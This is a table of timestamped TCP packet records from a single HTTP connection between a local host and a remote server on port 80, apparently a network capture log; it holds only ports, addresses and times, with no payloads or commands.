Dec 24, 2023 10:44:19.664782047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664824009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664863110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664877892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.664936066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.664984941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665019989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665079117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665128946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665138960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665189981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665229082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665231943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665282965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665323973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665353060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665453911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665494919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665510893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665586948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665635109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665651083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665719032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665769100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665776014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665833950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.665879011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.665930033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666009903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666052103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.666076899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666121006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666160107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.666186094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666237116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666279078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.666304111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666351080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666395903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.666419983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666450977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.666488886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935273886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935312986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935400009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935492039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935506105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935518980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935532093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935584068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935584068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935595036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935630083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935684919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935710907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935792923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935837984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935863972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935878038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.935925961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.935950994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936017990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936043978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936064959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936089993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936146975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936219931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936294079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936347961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936389923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936434984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936487913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936496973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936527014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936578989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936588049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936693907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936750889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936772108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936821938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936872959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.936889887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936943054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.936964035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937004089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937027931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937072992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937097073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937140942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937185049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937189102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937254906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937302113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937316895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937380075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937424898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937428951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937500954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937546968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937565088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937609911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937649965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937652111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937700987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937741041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.937748909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937834024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.937884092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:19.939048052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:19.993913889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.017792940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.017832994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.291795015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.310698032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.310928106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.311011076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.311247110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.311420918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.311484098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.311489105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.311959982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312098026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312156916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.312268972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312371969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312426090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.312453032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312504053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.312558889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312634945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.312685013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.312767029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313026905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313083887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.313126087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313204050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313395023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313443899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.313498020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313621044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313666105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.313730001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313775063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.313827038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313934088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.313980103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.314016104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314133883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314178944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.314241886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314342976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314431906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.314457893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314543009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314661980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314712048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.314748049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314862967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.314917088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315002918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315047026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315080881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315252066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315300941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315324068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315366030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315401077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315426111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315480947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315514088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315562010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315570116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315618992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315665007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.315673113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.315953016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316000938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316006899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316071033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316082001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316204071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316256046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316279888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316401005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316447973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316451073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316492081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316551924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316582918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316603899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316653967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316703081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316746950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316832066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316878080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316896915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.316939116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.316955090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317003012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317120075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317182064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317284107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317339897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317357063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317418098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317481995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317528963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317548037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317646980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317694902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317724943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317764044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317769051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317826033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.317874908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.317900896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318012953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318056107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318097115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318144083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318212986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318252087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318263054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318295002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318346024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318424940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318480968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318501949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318552971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318603039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318615913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318676949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318728924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318773031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318785906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318933010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318948030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.318981886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.318994045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319019079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319091082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319122076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319139004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319179058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319253922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319268942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319303036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319320917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319333076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319489002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319536924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319628000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319694996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319745064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319770098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319804907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319868088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319914103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.319931030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.319983006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320040941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320125103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320142031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320161104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320172071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320204973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320205927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320278883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320306063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320350885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320405960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320420980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320471048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320494890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320535898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320584059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320605993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320647001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320693016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320700884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320758104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320790052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320842981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320893049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.320908070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.320981979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321028948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321055889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321106911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321194887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321242094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321300983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321366072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321415901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321455002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321507931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321510077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321546078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321588993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321603060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321733952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321783066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.321881056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.321950912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322006941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322050095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322060108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322148085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322200060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322204113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322267056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322313070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322314978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322367907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322437048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322499990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322545052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322590113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322630882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322671890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322698116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322751045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322848082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.322890997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.322971106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323015928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323025942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323076010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323123932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323154926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323206902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323254108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323271990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323299885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323375940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323414087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323424101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323447943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323471069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323542118 CET	80	49716	91.215.85.17	192.168.2.5
